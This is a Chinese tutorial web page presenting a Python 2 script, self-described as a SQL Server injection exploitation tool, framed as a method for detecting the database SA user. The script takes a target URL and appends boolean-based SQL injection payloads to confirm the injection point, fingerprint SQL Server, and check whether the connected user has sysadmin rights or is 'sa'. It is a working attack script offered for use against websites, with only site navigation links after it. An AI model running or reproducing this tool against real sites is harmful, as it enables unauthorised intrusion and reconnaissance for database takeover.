本教程主要介绍Python编写数据库SA用户检测方案的一个方法,希望对大家有所帮助。
# Code by zhaoxiaobu Email: little.bu@hotmail.com
#-*- coding: UTF-8 -*-
from sys import exit
from urllib import urlopen
from string import join,strip
from re import search
def is_sqlable():
sql1="%20and%201=2"
sql2="%20and%201=1"
urlfile1=urlopen(url+sql1)
urlfile2=urlopen(url+sql2)
htmlcodes1=urlfile1.read()
htmlcodes2=urlfile2.read()
if not search(judge,htmlcodes1) and search(judge,htmlcodes2):
print "[信息]恭喜!这个URL是有注入漏洞的!\n"
print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."
is_SQLServer()
else:
print "[错误]你确定这个URL能用?换个别的试试吧!\n"
def is_SQLServer():
sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
if not search(judge,htmlcodes):
print "[错误]数据库好像不是SQL Server的!\n"
else:
print "[信息]确认是SQL Server数据库!\n"
print "[信息]开始检测当前数据库用户权限,请耐心等待......"
is_sysadmin()
def is_sysadmin():
sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print "[错误]当前数据库用户不具有sysadmin权限!\n"
else:
print "[信息]当前数据库用户具有sysadmin权限!\n"
print "[信息]检测当前用户是不是SA,请耐心等待......"
is_sa()
def is_sa():
sql = "%20and%20'sa'=(select%20System_user)";
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print "[错误]当前数据库用户不是SA!\n"
else:
print "[信息]当前数据库用户是SA!\n"
print "\n########################################################################\n"
print " ^o^SQL Server注入利用工具^o^ "
print " Email: little.bu@hotmail.com\n"
print "========================================================================";
url = raw_input('[信息]请输入一个可能有注入漏洞的链接!\nURL:')
if url == '':
print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"
exit(1)
judge = raw_input("[信息]请提供一个判断字符串.\n判断字符串:")
if judge == '':
print "[错误]判断字符串不能为空!"
exit(1)
is_sqlable()
Python编写数据库SA用户检测方案相关视频
相关阅读 Python和VensterCE开发工具如何安装和环境搭建.NET如何嵌入IronPythonPython正则表达式教程微信跳一跳python使用教程 微信跳一跳python怎么刷分如何利用IronPython实现.NET接口数据库流行度排行2019年9月 数据库排行榜2019年最新版fifa online4数据库大全 fifa online4球员数据库在哪myeclipse怎么连接到数据库 myeclipse连接到数据库方法
热门文章
oracle10g安装图解(wi
最新文章
数据库流行度排行2019oracle10g安装图解(wi
SQL2008全部数据导出导入两种方法SQL2005新建复制“找不到存储过程 错误:28Dos远程登录mysql数据库详细图文教程mysql怎么开启远程登录功能
人气排行 mysql自动定时备份数据库的最佳方法-支持wiVisual Foxpro 6.0安装向导图文教程SQL Server 2008 安装图文教程SQL2008全部数据导出导入两种方法SQL 2000/2005/2008 的收缩日志方法,和清理mysql出 Can't connect to MySQL server onoracle10g安装图解(win7)sql2005安装图解_(sql server2005)安装教程
查看所有0条评论>>